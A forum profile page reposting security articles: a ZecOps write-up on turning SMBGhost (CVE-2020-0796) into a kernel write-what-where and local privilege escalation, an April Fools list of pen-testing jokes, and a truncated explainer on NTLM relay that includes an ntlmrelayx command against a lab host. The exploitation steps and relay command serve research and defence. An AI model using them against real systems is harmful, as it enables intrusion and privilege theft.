-
Posts
18729 -
Joined
-
Last visited
-
Days Won
708
Everything posted by Nytro
-
Exploiting SMBGhost (CVE-2020-0796) for a Local Privilege Escalation: Writeup + POC By ZecOps Research Team | March 31, 2020 SHARE THIS ARTICLE 1.5k Shares 240 795 37 Introduction CVE-2020-0796 is a bug in the compression mechanism of SMBv3.1.1, also known as “SMBGhost”. The bug affects Windows 10 versions 1903 and 1909, and it was announced and patched by Microsoft about three weeks ago. Once we heard about it, we skimmed over the details and created a quick POC (proof of concept) that demonstrates how the bug can be triggered remotely, without authentication, by causing a BSOD (Blue Screen of Death). A couple of days ago we returned to this bug for more than just a remote DoS. The Microsoft Security Advisory describes the bug as a remote code execution (RCE) vulnerability, but there is no public POC that demonstrates RCE through this bug. Initial Analysis The bug is an integer overflow bug that happens in the Srv2DecompressData function in the srv2.sys SMB server driver. Here’s a simplified version of the function, with the irrelevant details omitted: 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 typedef struct _COMPRESSION_TRANSFORM_HEADER { ULONG ProtocolId; ULONG OriginalCompressedSegmentSize; USHORT CompressionAlgorithm; USHORT Flags; ULONG Offset; } COMPRESSION_TRANSFORM_HEADER, *PCOMPRESSION_TRANSFORM_HEADER; typedef struct _ALLOCATION_HEADER { // ... PVOID UserBuffer; // ... } ALLOCATION_HEADER, *PALLOCATION_HEADER; NTSTATUS Srv2DecompressData(PCOMPRESSION_TRANSFORM_HEADER Header, SIZE_T TotalSize) { PALLOCATION_HEADER Alloc = SrvNetAllocateBuffer( (ULONG)(Header->OriginalCompressedSegmentSize + Header->Offset), NULL); If (!Alloc) { return STATUS_INSUFFICIENT_RESOURCES; } ULONG FinalCompressedSize = 0; NTSTATUS Status = SmbCompressionDecompress( Header->CompressionAlgorithm, (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER) + Header->Offset, (ULONG)(TotalSize - sizeof(COMPRESSION_TRANSFORM_HEADER) - Header->Offset), (PUCHAR)Alloc->UserBuffer + Header->Offset, Header->OriginalCompressedSegmentSize, &FinalCompressedSize); if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) { SrvNetFreeBuffer(Alloc); return STATUS_BAD_DATA; } if (Header->Offset > 0) { memcpy( Alloc->UserBuffer, (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER), Header->Offset); } Srv2ReplaceReceiveBuffer(some_session_handle, Alloc); return STATUS_SUCCESS; } The Srv2DecompressData function receives the compressed message which is sent by the client, allocates the required amount of memory, and decompresses the data. Then, if the Offset field is not zero it copies the data that is placed before the compressed data as is to the beginning of the allocated buffer. If we look carefully, we can notice that lines 20 and 31 can lead to an integer overflow for certain inputs. For example, most POCs that appeared shortly after the bug publication and crashed the system just used the 0xFFFFFFFF value for the Offset field. Using the value 0xFFFFFFFF triggers an integer overflow on line 20, and as a result less bytes are allocated. Later, it triggers an additional integer overflow on line 31. The crash happens due to a memory access at the address calculated in line 30, far away from the received message. If the code verified the calculation at line 31, it would bail out early since the buffer length happens to be negative and cannot be represented, and that makes the address itself on line 30 invalid as well. Choosing what to overflow There are only two relevant fields that we can control to cause an integer overflow: OriginalCompressedSegmentSize and Offset, so there aren’t that many options. After trying several combinations, the following combination caught our eye: what if we send a legit Offset value and a huge OriginalCompressedSegmentSize value? Let’s go over the three steps the code is going to execute: Allocate: The amount of allocated bytes will be smaller than the sum of both fields due to the integer overflow. Decompress: The decompression will receive a huge OriginalCompressedSegmentSize value, treating the target buffer as practically having limitless size. All other parameters are unaffected thus it will work as expected. Copy: If it’s ever going to be executed (will it?), the copy will work as expected. Whether or not the Copy step is going to be executed, it already looks interesting – we can trigger an out of bounds write on the Decompress stage since we managed to allocate less bytes then necessary on the Allocate stage. As you can see, using this technique we can trigger an overflow of any size and content, which is a great start. But what is located beyond our buffer? Let’s find out! Diving into SrvNetAllocateBuffer To answer this question, we need to look at the allocation function, in our case SrvNetAllocateBuffer. Here is the interesting part of the function: 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 PALLOCATION_HEADER SrvNetAllocateBuffer(SIZE_T AllocSize, PALLOCATION_HEADER SourceBuffer) { // ... if (SrvDisableNetBufferLookAsideList || AllocSize > 0x100100) { if (AllocSize > 0x1000100) { return NULL; } Result = SrvNetAllocateBufferFromPool(AllocSize, AllocSize); } else { int LookasideListIndex = 0; if (AllocSize > 0x1100) { LookasideListIndex = /* some calculation based on AllocSize */; } SOME_STRUCT list = SrvNetBufferLookasides[LookasideListIndex]; Result = /* fetch result from list */; } // Initialize some Result fields... return Result; } We can see that the allocation function does different things depending on the required amount of bytes. Large allocations (larger than about 16 MB) just fail. Medium allocations (larger than about 1 MB) use the SrvNetAllocateBufferFromPool function for the allocation. Small allocations (the rest) use lookaside lists for optimization. Note: There’s also the SrvDisableNetBufferLookAsideList flag which can affect the functionality of the function, but it’s set by an undocumented registry setting and is disabled by default, so it’s not very interesting. Lookaside lists are used for effectively reserving a set of reusable, fixed-size buffers for the driver. One of the capabilities of lookaside lists is to define a custom allocation/free functions which will be used for managing the buffers. Looking at references for the SrvNetBufferLookasides array, we found that it’s initialized in the SrvNetCreateBufferLookasides function, and by looking at it we learned the following: The custom allocation function is defined as SrvNetBufferLookasideAllocate, which just calls SrvNetAllocateBufferFromPool. 9 lookaside lists are created with the following sizes, as we quickly calculated with Python: >>> [hex((1 << (i + 12)) + 256) for i in range(9)] [‘0x1100’, ‘0x2100’, ‘0x4100’, ‘0x8100’, ‘0x10100’, ‘0x20100’, ‘0x40100’, ‘0x80100’, ‘0x100100’] It matches our finding that allocations larger than 0x100100 bytes are allocated without using lookaside lists. The conclusion is that every allocation request ends up in the SrvNetBufferLookasideAllocate function, so let’s take a look at it. SrvNetBufferLookasideAllocate and the allocated buffer layout The SrvNetBufferLookasideAllocate function allocates a buffer in the NonPagedPoolNx pool using the ExAllocatePoolWithTag function, and then fills some of the structures with data. The layout of the allocated buffer is the following: The only relevant parts of this layout for the scope of our research are the user buffer and the ALLOCATION_HEADER struct. We can see right away that by overflowing the user buffer, we end up overriding the ALLOCATION_HEADER struct. Looks very convenient. Overriding the ALLOCATION_HEADER struct Our first thought at this point was that due to the check that follows the SmbCompressionDecompress call: if (Status < 0 || FinalCompressedSize != Header->OriginalCompressedSegmentSize) { SrvNetFreeBuffer(Alloc); return STATUS_BAD_DATA; } SrvNetFreeBuffer will be called and the function will fail, since we crafted OriginalCompressedSegmentSize to be a huge number, and FinalCompressedSize is going to be a smaller number which represents the actual amount of decompressed bytes. So we analyzed the SrvNetFreeBuffer function, managed to replace the allocation pointer to a magic number, and waited for the free function to try and free it, hoping to leverage it later for use-after-free or similar. But to our surprise, we got a crash in the memcpy function. That has made us happy, since we didn’t hope to get there at all, but we had to check why it happened. The explanation can be found in the implementation of the SmbCompressionDecompress function: 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 NTSTATUS SmbCompressionDecompress( USHORT CompressionAlgorithm, PUCHAR UncompressedBuffer, ULONG UncompressedBufferSize, PUCHAR CompressedBuffer, ULONG CompressedBufferSize, PULONG FinalCompressedSize) { // ... NTSTATUS Status = RtlDecompressBufferEx2( ..., FinalUncompressedSize, ...); if (Status >= 0) { *FinalCompressedSize = CompressedBufferSize; } // ... return Status; } Basically, if the decompression succeeds, FinalCompressedSize is updated to hold the value of CompressedBufferSize, which is the size of the buffer. This deliberate update of the FinalCompressedSize return value seemed quite suspicious for us, since this little detail, together with the allocated buffer layout, allows for a very convenient exploitation of this bug. Since the execution continues to the stage of copying the raw data, let’s review the call once again: memcpy( Alloc->UserBuffer, (PUCHAR)Header + sizeof(COMPRESSION_TRANSFORM_HEADER), Header->Offset); The target address is read from the ALLOCATION_HEADER struct, the one that we can override. The content and the size of the buffer are controlled by us as well. Jackpot! Write-what-where in the kernel, remotely! Remote write-what-where implementation We did a quick implementation of a Write-What-Where CVE-2020-0796 Exploit in Python, which is based on the CVE-2020-0796 DoS POC of maxpl0it. The code is fairly short and straightforward. Local Privilege Escalation Now that we have the write-what-where exploit, what can we do with it? Obviously we can crash the system. We might be able to trigger remote code execution, but we didn’t find a way to do that yet. If we use the exploit on localhost and leak additional information, we can use it for local privilege escalation, as it was already demonstrated to be possible via several techniques. The first technique we tried was proposed by Morten Schenk in his Black Hat USA 2017 talk. The technique involves overriding a function pointer in the .data section of the win32kbase.sys driver, and then calling the appropriate function from user mode to gain code execution. j00ru wrote a great writeup about using this technique in WCTF 2018, and provided his exploit source code. We adjusted it for our write-what-where exploit, but found out that it doesn’t work since the thread that handles the SMB messages is not a GUI thread. Due to this, win32kbase.sys is not mapped, and the technique is not relevant (unless there’s a way to make it a GUI thread, something we didn’t research). We ended up using the well known technique covered by cesarcer in 2012 in his Black Hat presentation Easy Local Windows Kernel Exploitation. The technique is about leaking the current process token address by using the NtQuerySystemInformation(SystemHandleInformation) API, and then overriding it, granting the current process token privileges that can then be used for privilege escalation. The Abusing Token Privileges For EoP research by Bryan Alexander (dronesec) and Stephen Breen (breenmachine) (2017) demonstrates several ways of using various token privileges for privilege escalation. We based our exploit on the code that Alexandre Beaulieu kindly shared in his Exploiting an Arbitrary Write to Escalate Privileges writeup. We completed the privilege escalation after modifying our process’ token privileges by injecting a DLL into winlogon.exe. The DLL’s whole purpose is to launch a privileged instance of cmd.exe. Our complete Local Privilege Escalation Proof of Concept can be found here and is available for research / defensive purposes only. Summary We managed to demonstrate that the CVE-2020-0796 vulnerability can be exploited for local privilege escalation. Note that our exploit is limited for medium integrity level, since it relies on API calls that are unavailable in a lower integrity level. Can we do more than that? Maybe, but it will require more research. There are many other fields that we can override in the allocated buffer, perhaps one of them can help us achieve other interesting things such as remote code execution. POC Source Code Remediation We recommend updating servers and endpoints to the latest Windows version to remediate this vulnerability. If possible, block port 445 until updates are deployed. Regardless of CVE-2020-0796, we recommend enabling host-isolation where possible. It is possible to disable SMBv3.1.1 compression in order to avoid triggers to this bug, however we recommend to do full update instead if possible. Sursa: https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/
-
- 1
-
-
Top 12 tips every pentester should know April 1, 2020 In 2020, both big and small companies alike are embracing pen-testing as a solution to ensure the quality and availability of their mission-critical communication systems and data storage. Detectify Crowdsource is our private bug bounty community that’s powering our automated web security scanners to protect 1000s of security teams. It’s true that bug bounty hunters and pen-testers are not the same breed yet we see a lot of our hackers learning new skills to break into the pen-testing scene, and help keep out hackers with hats as black as ink. Detectify security researcher, Fredrik N. Almroth and his thoughts on the growing interest for pen-testing: “As a researcher, I see a lot of mistakes that can be avoided out in the wild such as unauthorized access to things in the supply chain and obvious tampering marks in the data. Year after year, companies have 2 options with pentesting: they can be proactive with testing business assets, or react once everything suddenly breaks at once. If you have the resources, bringing in pentesting can help companies stay on top of risks and get results before the ink is even dry on the auditing contract.” While there are differences in what they do, there are also a lot of similarities. So we asked the Detectify Crowdsource community, some who’ve even hacked the Pentagon, to share some of their top-paying tips that every great pen-tester should know: Top 12 tips every pen-tester should know: #12 @gehaxelt: I don’t think all of people know what true pen-testing really is. It’s all about documentation, and the writing between the lines. #11 @p4fg: “Find your niche. When it comes to pentesting, I’ve found it to be more lucrative to become an expert on fountain pens, than being a jack-of-all-pens.” #10 @peterjaric: “Know when to move on – As Einstein said: ‘Insanity is doing the same thing over and over again, but expecting different results.’ It’s the same with testing pens.” #9 @streaak: “It’s fierce competition out there, but do what’s going to get you paid, and not in the penitentiary.” #8 @ozgur_bbh “Always carry a pineapple.” #7 @0xLerhan: “Be creative and test where others don’t dare to test. The best results come where others aren’t looking.” #6 @alxbrsn: “Communicate business impact.” #5 @mahajan344: “Don’t lose track of the scope – it’s easy to get sucked in by pencils because they have erasers, but you’re really there for the pens. #4 @ErwinGeirnaert: “Wash your hands before and after testing, you don’t know how many hands have handled it.” #3 @JR0ch17: “My favourite command is `curl -pen http://google.com` “ #2 @JLLeitschuh: “We’ll all probably get carpal tunnel one day, but you can delay it if you automate all the repetitive tasks… like knowing the half-life of its ink.” #1 @tomnomnom: Put pen-to-paper and share what you found with the community. Embrace the twitter fame.” As mentioned our community applies these tips already today, and we’ve had great updates of progress including from researcher, @tareksiddiki: “Following these tips have helped me keep my eyes on the ball and I’ve pointed out numerous flaws to my clients, helping them cross t’s and dot the i’s. It’s really helped me put a feather in my cap as a pen-tester!” There you have it, some top-paying pen-testing tips from Detectify Crowdsource hackers. Now it’s time to get out there and get your next gig. Happy pen-testing! Happy April Fool’s Day! Sursa: https://blog.detectify.com/2020/04/01/top-pen-testing-tips-detectify-crowdsource/
-
NTLM Relay 01 Apr 2020 · 47 min Author : Pixis Active Directory Windows In this post » Preliminary » Introduction » NTLM Relay » In practice » Authentication vs Session » Session signing » Authentication signing (MIC) » Session key » Channel Binding » What can be relayed? » Stop. Using. NTLMv1. » Conclusion NTLM relay is a technique of standing between a client and a server to perform actions on the server while impersonating the client. It can be very powerful and can be used to take control of an Active Directory domain from a black box context (no credentials). The purpose of this article is to explain NTLM relay, and to present its limits. Preliminary This article is not meant to be a tutorial to be followed in order to carry out a successful attack, but it will allow the reader to understand in detail the technical details of this attack, its limitations, and can be a basis to start developing his own tools, or understand how current tools work. In addition, and to avoid confusion, here are some reminders: NT Hash and LM Hash are hashed versions of user passwords. LM hashes are totally obsolete, and will not be mentioned in this article. NT hash is commonly called, wrongly in my opinion, “NTLM hash”. This designation is confusing with the protocol name, NTLM. Thus, when we talk about the user’s password hash, we will refer to it as NT hash. NTLM is therefore the name of the authentication protocol. It also exists in version 2. In this article, if the version affects the explanation, then NTLMv1 and NTLMv2 will be the terms used. Otherwise, the term NTLM will be used to group all versions of the protocol. NTLMv1 Hash and NTLMv2 Hash will be the terminology used to refer to the challenge response sent by the client, for versions 1 and 2 of the NTLM protocol. Net-NTLMv1 and Net-NTLMv2 are pseudo-neo-terminologies used when the NT hash is called NTLM hash in order to distinguish the NTLM hash from the protocol. Since we do not use the NTLM hash terminology, these two terminologies will not be used. Net-NTLMv1 Hash and Net-NTLMv2 Hash are also terminologies to avoid confusion, but will also not be used in this article. Introduction NTLM relay relies, as its name implies, on NTLM authentication. The basics of NTLM have been presented in pass-the-hash article. I invite you to read at least the part about NTLM protocol and local and remote authentication. As a reminder, NTLM protocol is used to authenticate a client to a server. What we call client and server are the two parts of the exchange. The client is the one that wishes to authenticate itself, and the server is the one that validates this authentication. This authentication takes place in 3 steps: First the client tells the server that it wants to authenticate. The server then responds with a challenge which is nothing more than a random sequence of characters. The client encrypts this challenge with its secret, and sends the result back to the server. This is its response. This process is called challenge/response. The advantage of this exchange is that the user’s secret never passes through the network. This is known as Zero-knowledge proof. NTLM Relay With this information, we can easily imagine the following scenario: An attacker manages to be in a man-in-the-middle position between a client and a server, and simply relays information from one to the other. The man-in-the-middle position means that from the client’s point of view, the attacker’s machine is the server to which he wants to authenticate, and from the server’s point of view, the attacker is a client like any other who wants to authenticate. Except that the attacker does not “just” want to authenticate to the server. He wishes to do so by pretending to be the client. However, he does not know the secret of the client, and even if he listens to the conversations, as this secret is never transmitted over the network (zero-knowledge proof), the attacker is not able to extract any secret. So, how does it work? Message Relaying During NTLM authentication, a client can prove to a server its identify by encrypting with its password some piece of information provided by the server. So the only thing the attacker has to do is to let the client do his work, and passing the messages from the client to the server, and the replies from the server to the client. All that the client has to send to the server, the attacker will receive it, and he will send the messages back to the real server, and all the messages that the server sends to the client, the attacker will also receive them, and he will forward them to the client, as is. And it’s all working out! Indeed, from the client’s point of view, on the left part on the diagram, an NTLM authentication takes place between the attacker and him, with all the necessary bricks. The client sends a negotiate request in its first message, to which the attacker replies with a challenge. Upon receiving this challenge, the client builds its response using its secret, and finally sends the last authentication message containing the encrypted challenge. Ok, that’s great but the attacker cannot do anything with this exchange. Fortunately, there is the right side of the diagram. Indeed, from the server’s point of view, the attacker is a client like any other. He sent a first message to ask for authentication, and the server responded with a challenge. As the attacker sent this same challenge to the real client, the real client encrypted this challenge with its secret, and responded with a valid response. The attacker can therefore send this valid response to the server. This is where the interest of this attack lies. From the server’s point of view, the attacker has authenticated himself using the victim’s secret, but in a transparent way for the server. It has no idea that the attacker was replaying his messages to the client in order to get the client to give him the right answers. So, from the server’s point of view, this is what happened: At the end of these exchanges, the attacker is authenticated on the server with the client’s credentials. Net-NTLMv1 and Net-NTLMv2 For information, it is this valid response relayed by the attacker in message 3, the encrypted challenge, that is commonly called Net-NTLMv1 hash or Net-NTLMv2 hash. But in this article, it will be called NTLMv1 hash or NTLMv2 hash, as indicated in the preliminary paragraph. To be exact, this is not exactly an encrypted version of the challenge, but a hash that uses the client’s secret. It is HMAC_MD5 function which is used for NTLMv2 for example. This type of hash can only be broken by brute force. The cryptography associated with computation of the NTLMv1 hash is obsolete, and the NT hash that was used to create the hash can be retrieved very quickly. For NTLMv2, on the other hand, it takes much longer. It is therefore preferable and advisable not to allow NTLMv1 authentication on a production network. In practice As an example, I set up a small lab with several machines. There is DESKTOP01 client with IP address 192.168.56.221 and WEB01 server with IP address 192.168.56.211. My host is the attacker, with IP address 192.168.56.1. So we are in the following situation: The attacker has therefore managed to put himself man-in-the-middle position. There are different techniques to achieve this, whether through abuse of default IPv6 configurations in a Windows environment, or through LLMNR and NBT-NS protocols. Either way, the attacker makes the client think that he is the server. Thus, when the client tries to authenticate itself, it is with the attacker that it will perform this operation. The tool I used to perform this attack is ntlmrelayx from impacket. This tool is presented in details in this article by Agsolino, impacket (almighty) developer. ntlmrelayx.py -t 192.168.56.221 The tool creates different servers, including an SMB server for this example. If it receives a connection on this server, it will relay it to the provided target, which is 192.168.56.221 in this example. From a network point of view, here is a capture of the exchange, with the attacker relaying the information to the target. In green are the exchanges between DESKTOP01 client and the attacker, and in red are the exchanges between the attacker and WEB01 server. We can clearly see the 3 NTLM messages between DESKTOP01 and the attacker, and between the attacker and WEB01 server. And to understand the notion of relay, we can verify that when WEB01 sends a challenge to the attacker, the attacker sends back exactly the same thing to DESKTOP01. Here is the challenge sent by WEB01 to the attacker : When the attacker receives this challenge, he sends it to DESKTOP01 without any modification. In this example, the challenge is b6515172c37197b0. The client will then compute the response using his secret, as we have seen in the previous paragraphs, and he will send his response alongside with his username (jsnow), his hostname (DESKTOP01), and in this example he indicates that he is a domain user, so he provides the domain name (ADSEC). The attacker who gets all that doesn’t ask questions. He sends the exact same information to the server. So he pretends to be jsnow on DESKTOP01 and part of ADSEC domain, and he also sends the response that has been computed by the client, called NTLM Response in these screenshots. We call this response NTLMv2 hash. We can see that the attacker was only relaying stuff. He just relayed the information from the client to the server and vice versa, except that in the end, the server thinks that the attacker is successfully authenticated, and the attacker can then perform actions on the server on behalf of ADSEC\jsnow. Authentication vs Session Now that we have understood the basic principle of NTLM relay, the question that arises is how, concretely, can we perform actions on a server after relaying NTLM authentication? By the way, what do we mean by “actions”? What is it possible to do? To answer this question, we must first clarify one fundamental thing. When a client authenticates to a server to do something, we must distinguish two things: Authentication, allowing the server to verify that the client is who it claims to be. The session, during which the client will be able to perform actions. Thus, if the client has authenticated correctly, it will then be able to access the resources offered by the server, such as network shares, access to an LDAP directory, an HTTP server or a SQL database. This list is obviously not exhaustive. To manage these two steps, the protocol that is used must be able to encapsulate the authentication, thus the exchange of NTLM messages. Of course, if all the protocols were to integrate NTLM technical details, it would quickly become a holy mess. That’s why Microsoft provides an interface that can be relied on to handle authentication, and packages have been specially developed to handle different types of authentication. SSPI & NTLMSSP The SSPI interface, or Security Support Provider Interface, is an interface proposed by Microsoft to standardize authentication, regardless of the type of authentication used. Different packages can connect to this interface to handle different types of authentication. In our case, it is the NTLMSSP package (NTLM Security Support Provider) that interests us, but there is also a package for Kerberos authentication, for example. Without going into details, the SSPI interface provides several functions, including AcquireCredentialsHandle, InitializeSecurityContext and AcceptSecurityContext. During NTLM authentication, both the client and the server will use these functions. The steps are only briefly described here. The client calls AcquireCredentialsHandle in order to gain indirect access to the user credentials. The client then calls InitializeSecurityContext, a function which, when called for the first time, will create a message of type 1, thus of type NEGOTIATE. We know this because we’re interested in NTLM, but for a programmer, it doesn’t matter what this message is. All that matters is to send it to the server. The server, when receiving the message, calls the AcceptSecurityContext function. This function will then create the type 2 message, the CHALLENGE. When receiving this message, the client will call InitializeSecurityContext again, but this time passing the CHALLENGE as an argument. The NTLMSSP package takes care of everything to compute the response by encrypting the challenge, and will produce the last AUTHENTICATE message. Upon receiving this last message, the server also calls AcceptSecurityContext again, and the authentication verification will be performed automatically. The reason these steps are explained is to show that in reality, from the client or server point of view, the structure of the 3 messages that are exchanged does not matter. We, with our knowledge of the NTLM protocol, know what these messages correspond to, but both the client and the server don’t care. These messages are described in the Microsoft documentation as opaque tokens. This means that these 5 steps are completely independent of client’s type or server’s type. They work regardless of the protocol used as long as the protocol has something in place to allow this opaque structure to be exchanged in one way or another from the client to the server. So the protocols have adapted to find a way to put an NTLMSSP, Kerberos, or other authentication structure into a specific field, and if the client or server sees that there is data in that field, it just passes it to InitializeSecurityContext or AcceptSecurityContext. This point is quite important, since it clearly shows that the application layer (HTTP, SMB, SQL, …) is completely independent from the authentication layer (NTLM, Kerberos, …). Therefore, security measures are both needed for the authentication layer and for the application layer. For a better understanding, we will see the two examples of application protocols SMB and HTTP. It’s quite easy to find documentation for other protocols. It’s always the same principle. Integration with HTTP This is what a basic HTTP request looks like. GET /index.html HTTP/1.1 Host: beta.hackndo.com User-Agent: Mozilla/5.0 Accept: text/html Accept-Language: fr The mandatory elements in this example are the HTTP verb (GET), the path to the requested page (/index.html), the protocol version (HTTP/1.1), or the Host header (Host: beta.hackndo.com). But it is quite possible to add other arbitrary headers. At best, the remote server is aware that these headers will be present, and it will know how to handle them, and at worst it will ignore them. This allows you to have the same request with some additional information. GET /index.html HTTP/1.1 Host: beta.hackndo.com User-Agent: Mozilla/5.0 Accept: text/html Accept-Language: en X-Name: pixis Favorite-Food: Beer 'coz yes, beer is food It is this feature that is used to be able to transfer NTLM messages from the client to the server. It has been decided that the client sends its messages in a header called Authorization and the server in a header called WWW-Authenticate. If a client attempts to access a web site requiring authentication, the server will respond by adding the WWW-Authenticate header, and highlighting the different authentication mechanisms it supports. For NTLM, it will simply say NTLM. The client, knowing that NTLM authentication is required, will send the first message in the Authorization header, encoded in base 64 because the message does not only contain printable characters. The server will respond with a challenge in the WWW-Authenticate header, the client will compute the response and will send it in Authorization. If authentication is successful, the server will usually return a 200 return code indicating that everything went well. > GET /index.html HTTP/1.1 > Host: beta.hackndo.com > User-Agent: Mozilla/5.0 > Accept: text/html > Accept-Language: en < HTTP/1.1 401 Unauthorized < WWW-Authenticate: NTLM < Content type: text/html < Content-Length: 0 > GET /index.html HTTP/1.1 > Host: beta.hackndo.com > User-Agent: Mozilla/5.0 > Accept: text/html > Accept-Language: en => Authorization: NTLM <NEGOTIATE in base 64> < HTTP/1.1 401 Unauthorized => WWW-Authenticate: NTLM <CHALLENGE in base 64> < Content type: text/html < Content-Length: 0 > GET /index.html HTTP/1.1 > Host: beta.hackndo.com > User-Agent: Mozilla/5.0 > Accept: text/html > Accept-Language: en => Authorization: NTLM <RESPONSE in base 64> < HTTP/1,200 OKAY. < WWW-Authenticate: NTLM < Content type: text/html < Content-Length: 0 < Connection: close As long as the TCP session is open, authentication will be effective. As soon as the session closes, however, the server will no longer have the client’s security context, and a new authentication will have to take place. This can often happen, and thanks to Microsoft’s SSO (Single Sign On) mechanisms, it is often transparent to the user. Integration with SMB Let’s take another example frequently encountered in a company network. It is SMB protocol, used to access network shares, but not only. SMB protocol works by using commands. They are documented by Microsoft, and there are many of them. For example, there are SMB_COM_OPEN, SMB_COM_CLOSE or SMB_COM_READ, commands to open, close or read a file. SMB also has a command dedicated to configuring an SMB session, and this command is SMB_COM_SESSION_SETUP_ANDX. Two fields are dedicated to the contents of the NTLM messages in this command. LM/LMv2 Authentication: OEMPassword NTLM/NTLMv2 authentication: UnicodePassword What is important to remember is that there is a specific SMB command with an allocated field for NTLM messages. Here is an example of an SMB packet containing the response of a server to an authentication. HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters These two examples show that the content of NTLM messages is protocol-independent. It can be included in any protocol that supports it. It is then very important to clearly distinguish the authentication part, i.e. the NTLM exchanges, from the application part, or the session part, which is the continuation of the exchanges via the protocol used once the client is authenticated, like browsing a website via HTTP or accessing files on a network share if we use SMB. As this information is independent, it means that a man-in-the-middle may very well receive authentication via HTTP, for example, and relay it to a server but using SMB. This is called cross-protocol relay. With all these aspects in mind, the following chapters will highlight the various weaknesses that exist or have existed, and the security mechanisms that come into play to address them. Session signing Principle A signature is an authenticity verification method, and it ensures that the item has not been tampered with between sending and receiving. For example, if the user jdoe sends the text I love hackndo, and digitally signs this document, then anyone who receives this document and his signature can verify that it was jdoe who edited it, and can be assured that he wrote this sentence, and not another, since the signature guarantees that the document has not been modified. The signature principle can be applied to any exchange, as long as the protocol supports it. This is for example the case of SMB, LDAP and even HTTP. In practice, the signing of HTTP messages is rarely implemented. But then, what’s the point of signing packages? Well, as discussed earlier, session and authentication are two separate steps when a client wants to use a service. Since an attacker can be in a man-in-the-middle position and relay authentication messages, he can impersonate the client when talking with the server. This is where signing comes into play. Even if the attacker has managed to authenticate to the server as the client, he will not be able to sign packets, regardless of authentication. Indeed, in order to be able to sign a packet, one must know the secret of the client. In NTLM relay, the attacker wants to pretend to be a client, but he has no knowledge of his secret. He is therefore unable to sign anything on behalf of the client. Since he can’t sign any packet, the server receiving packets will either see that the signature is not present, or that it doesn’t exist, and will reject the attacker’s request. So you understand that if packets must necessarily be signed after authentication, then the attacker can no longer operate, since he has no knowledge of the client’s secret. So the attack will fail. This is a very effective measure to protect against NTLM relay. That’s all very well, but how do the client and the server agree on whether or not to sign packets? Well that’s a very good question. Yes, I know, I’m the one asking it, but that doesn’t make it irrelevant. There are two things that come into play here. The first one is to indicate if signing is supported. This is done during NTLM negotiation. The second one allows to indicate if signing will be required, optional or disabled. This is a setting that is done at the client and server level. NTLM Negotiation This negotiation allows to know if the client and/or the server support signing (among other things), and is done during the NTLM exchange. So I lied to you a bit earlier, authentication and session are not completely independent. (By the way, I said that since it was independent, you could change protocol when relaying, but there are limits, we will see them in the chapter on MIC in NTLM authentication). In fact, in NTLM messages, there is other information other than a challenge and the response that are exchanged. There are also negotiation flags, or Negotiate Flags. These flags indicate what the sending entity supports. There are several flags, but the one of interest here is NEGOTIATE_SIGN. When this flag is set to 1 by the client, it means that the client supports signing. Be careful, it does not mean that he will necessarily sign his packets. Just that he’s capable of it. Similarly when the server replies, if it supports signing then the flag will also be set to 1. This negotiation thus allows each of the two parties, client and server, to indicate to the other if it is able sign packets. For some protocols, even if the client and the server support signing, this does not necessarily mean that the packets will be signed. Implementation Now that we’ve seen how both parties indicate to the other their ability to sign packets, they have to agree on it. This time, this decision is made according to the protocol. So it will be decided differently for SMBv1, for SMBv2, or for LDAP. But the idea remains the same. Depending on the protocol, there are usually 2 or even 3 options that can be set to decide wether signing will be enforced, or not. The 3 options are : Disabled : This means that signing is not managed. Enabled: This option indicates that the machine can handle signing if need be, but it does not require signing. Mandatory: This finally indicates that signing is not only supported, but that packets must be signed in order for the session to continue. We will see here the example of two protocols, SMB and LDAP. SMB Signature matrix A matrix is provided in Microsoft documentation to determine whether or not SMB packets are signed based on client-side and server-side settings. I’ve reported it in this table. Note however that for SMBv2 and higher, signing is necessarily handled, the Disabled parameter no longer exists. There is a difference when client and server have the Enabled setting. In SMBv1, the default setting for servers was Disabled. Thus, all SMB traffic between clients and servers was not signed by default. This avoided overloading the servers by preventing them from computing signatures each time an SMB packet was sent. As the Disabled status no longer exists for SMBv2, and servers are now Enabled by default, in order to keep this load saving, the behavior between two Enable entites has been modified, and signing is no longer required in this case. The client and/or the server must necessarily require the signature for SMB packets to be signed. Settings In order to change the default signing settings on a server, the EnableSecuritySignature and RequireSecuritySignature keys must be changed in registry hive HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters. This screenshot was taken on a domain controller. By default, domain controllers require SMB signing when a client authenticates to them. Indeed, the GPO applied to domain controllers contains this entry: On the other hand, we can see on this capture that above this setting, the same parameter applied to Microsoft network client is not applied. So when the domain controller acts as an SMB server, SMB signing is required, but if a connection comes from the domain controller to a server, SMB signing is not required. Setup Now that we know where SMB signing is configured, we can see this parameter applied during an communication. It is done just before authentication. In fact, when a client connects to the SMB server, the steps are as follows: Negotiation of the SMB version and signing requirements Authentication SMB session with negotiated parameters Here is an example of SMB signing negotiation: We see a response from a server indicating that it has the Enable parameter, but that it does not require signing. To summarize, here is how a negotiation / authentication / session takes place : In the negotiation phase, both parties indicate their requirements: Is signing required for one of them? In the authentication phase, both parties indicate what they support. Are they capable of signing? In the session phase, if the capabilities and the requirements are compatible, the session is carried out applying what has been negotiated. For example, if DESKTOP01 client wants to communicate with DC01 domain controller, DESKTOP01 indicates that it does not require signing, but that that he can handle it, if needed. DC01 indicates that not only he supports signing, but that he requires it. During negotiation phase, the client and server set the NEGOTIATE_SIGN flag to 1 since they both support signing. Once this authentication is completed, the session continues, and the SMB exchanges are effectively signed. LDAP Signing matrix For LDAP, there are also three levels: Disabled: This means that packet signing is not supported. Negotiated Signing: This option indicates that the machine can handle signing, and if the machine it is communicating with also handles it, then they will be signed. Required: This finally indicates that signing is not only supported, but that packets must be signed in order for the session to continue. As you can read, the intermediate level, Negotiated Signing differs from the SMBv2 case, because this time, if the client and the server are able to sign packets, then they will. Whereas for SMBv2, packets were only signed if it was a requirement for at least one entity. So for LDAP we have a matrix similar to SMBv1, except for the default behaviors. The difference with SMB is that in 